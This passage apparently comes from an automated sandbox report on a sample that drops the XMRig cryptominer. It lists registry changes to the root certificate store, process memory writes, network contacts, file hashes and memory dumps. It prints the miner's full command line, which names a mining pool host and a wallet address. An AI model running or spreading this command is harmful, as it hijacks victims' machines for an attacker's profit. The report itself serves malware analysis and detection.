dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4588 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4588 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4728-16-0x0000025724FE0000-0x0000025725000000-memory.dmp
memory/4728-17-0x0000025726A10000-0x0000025726A30000-memory.dmp
memory/4728-18-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-20-0x0000025726A50000-0x0000025726A70000-memory.dmp
memory/4728-19-0x0000025726A30000-0x0000025726A50000-memory.dmp
memory/4728-21-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-22-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-25-0x0000025726A50000-0x0000025726A70000-memory.dmp
memory/4728-24-0x0000025726A30000-0x0000025726A50000-memory.dmp
memory/4728-23-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-26-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-27-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-28-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-29-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-30-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-31-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-32-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-33-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-34-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-35-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-36-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-37-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-38-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-39-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-40-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-41-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-42-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-43-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-44-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-45-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-46-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-47-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-48-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-49-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-50-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-51-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-52-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-53-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-54-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-55-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-56-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-57-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-58-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-59-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-60-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-61-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-62-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-63-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-64-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-65-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-66-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-67-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-68-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-69-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-70-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-71-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-72-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-73-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-74-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-75-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-76-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-77-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-78-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-79-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-80-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-81-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-82-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-83-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-84-0x00007FF733570000-0x00007FF734073000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:01
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4432 wrote to memory of 1960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4432 wrote to memory of 1960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1960-16-0x0000020DB84A0000-0x0000020DB84C0000-memory.dmp
memory/1960-17-0x0000020DB9ED0000-0x0000020DB9EF0000-memory.dmp
memory/1960-18-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-20-0x0000020E4C8D0000-0x0000020E4C8F0000-memory.dmp
memory/1960-19-0x0000020DB9EF0000-0x0000020DB9F10000-memory.dmp
memory/1960-21-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-22-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-25-0x0000020E4C8D0000-0x0000020E4C8F0000-memory.dmp
memory/1960-24-0x0000020DB9EF0000-0x0000020DB9F10000-memory.dmp
memory/1960-23-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-26-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-27-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-28-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-29-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-30-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-31-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-32-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-33-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-34-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-35-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-36-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-37-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-38-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-39-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-40-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-41-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-42-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-43-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-44-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-45-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-46-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-47-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-48-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-49-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-50-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-51-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-52-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-53-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-54-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-55-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-56-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-57-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-58-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-59-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-60-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-61-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-62-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-63-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-64-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-65-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-66-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-67-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-68-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-69-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-70-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
